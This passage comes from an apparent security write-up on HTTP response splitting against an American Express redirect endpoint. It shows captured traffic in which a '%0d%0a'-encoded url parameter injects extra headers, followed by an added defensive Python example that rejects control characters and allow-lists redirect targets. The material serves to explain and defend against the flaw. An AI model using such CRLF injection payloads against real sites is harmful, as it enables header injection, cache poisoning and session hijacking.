
Location: http://www.americanexpress.com/
Test: XX
Content-Language: en
Connection: close
We see that an injection has occurred, because our header, Test: XX, appears
in the response. But can we inject any more?
[Our URL]
http://www65.americanexpress.com/clicktrk/Tracking?url=%0d%0aTest:%20XX%0d%0aTest:%20XXX
[Client Request Headers]
GET /clicktrk/Tracking?url=%0d%0aTest:%20XX%0d%0aTest:%20XXX HTTP/1.1
Host: www65.americanexpress.com
[Server Response Headers]
HTTP/1.x 302 OK
Server: Netscape-Enterprise/3.6 SP3
Date: Fri, 17 Jun 2005 15:10:02 GMT
Content-Type: text/html
Location: http://www.americanexpress.com/
Test: XX, XXX
Content-Language: en
Connection: close
Interesting result—this ...
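The check that stops the injection shown above, as an added example (not code from the original paper or from the affected site). The naive_redirect model of the flaw, the ALLOWED_HOSTS allow-list and all function names are assumptions; the query string and the Location value are the ones in the capture.

```python
import re
from urllib.parse import parse_qs, urlsplit

PAGE_QUERY = "url=%0d%0aTest:%20XX%0d%0aTest:%20XXX"  # query string from the request above
BASE = "http://www.americanexpress.com/"              # Location value seen in the capture
ALLOWED_HOSTS = {"www.americanexpress.com"}           # assumed allow-list
CTL = re.compile(r"[\x00-\x1f\x7f]")                  # CR, LF and all other control bytes


def _url_param(query):
    # parse_qs percent-decodes, so %0d%0a arrives here as a real CR LF pair.
    return parse_qs(query, keep_blank_values=True).get("url", [""])[0]


def naive_redirect(query):
    """Assumed model of the flaw: the decoded value is written into the header block unchecked."""
    head = ["HTTP/1.1 302 Found", "Location: " + BASE + _url_param(query), "Connection: close"]
    return ("\r\n".join(head) + "\r\n\r\n").encode("latin-1")


def safe_redirect(query):
    """Reject control characters first, then allow-list the target, then emit the header."""
    url = _url_param(query)
    # Check before urlsplit(): recent Python versions silently strip CR/LF/TAB while parsing.
    if CTL.search(url):
        raise ValueError("control character in redirect target")
    target = url or BASE
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("redirect target not on allow-list")
    head = ["HTTP/1.1 302 Found", "Location: " + target, "Connection: close"]
    return ("\r\n".join(head) + "\r\n\r\n").encode("latin-1")


def header_fields(raw):
    """Split a raw response into (name, value) pairs the way a client would."""
    lines = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")[1:]
    return [tuple(s.strip() for s in line.split(":", 1)) for line in lines]


if __name__ == "__main__":
    print(header_fields(naive_redirect(PAGE_QUERY)))
    try:
        safe_redirect(PAGE_QUERY)
    except ValueError as exc:
        print("rejected:", exc)
```

The naive builder emits two separate Test header lines for the page's query string, while the hardened one refuses the request before any header is written.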